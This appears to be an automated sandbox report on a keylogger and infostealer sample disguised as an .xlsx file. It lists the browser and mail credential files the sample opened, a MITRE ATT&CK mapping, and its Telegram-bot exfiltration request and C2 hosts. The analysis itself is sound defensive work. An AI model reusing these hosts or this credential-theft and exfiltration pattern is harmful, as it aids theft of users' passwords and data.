                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		13
                    System Information Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    Query Registry                    		Remote Desktop Protocol1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                    Obfuscated Files or Information                    		Security Account Manager1
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model1
                    Clipboard Data                    		1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets31
                    Virtualization/Sandbox Evasion                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input Capture24
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DC74433Y7889021.xlsx.exe100%AviraHEUR/AGEN.1309271
                    DC74433Y7889021.xlsx.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    http://varders.kozow.com:80810%Avira URL Cloudsafe
                    http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                    http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
                    http://aborters.duckdns.org:8081100%Avira URL Cloudmalware
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		188.114.97.3
                    		truetrue
                      		unknown
                      s4.serv00.com
                      		213.189.52.181
                      		truetrue
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown
                          checkip.dyndns.com
                          		193.122.130.0
                          		truefalse
                            		unknown
                            checkip.dyndns.org
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		unknown
                                https://reallyfreegeoip.org/xml/8.46.123.33false
                                • URL Reputation: safe
                                		unknown
                                http://checkip.dyndns.org/false
                                • URL Reputation: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.comDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersGDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/?DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/bTheDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.org/botDC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers?DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.tiro.comDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.goodfont.co.krDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://chrome.google.com/webstore?hl=enDC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://varders.kozow.com:8081DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comlDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://aborters.duckdns.org:8081DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.typography.netDDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://51.38.247.67:8081/_send_.php?LDC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://anotherarmy.dns.army:8081DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallDC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://checkip.dyndns.org/qDC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fonts.comDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sandoll.co.krDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
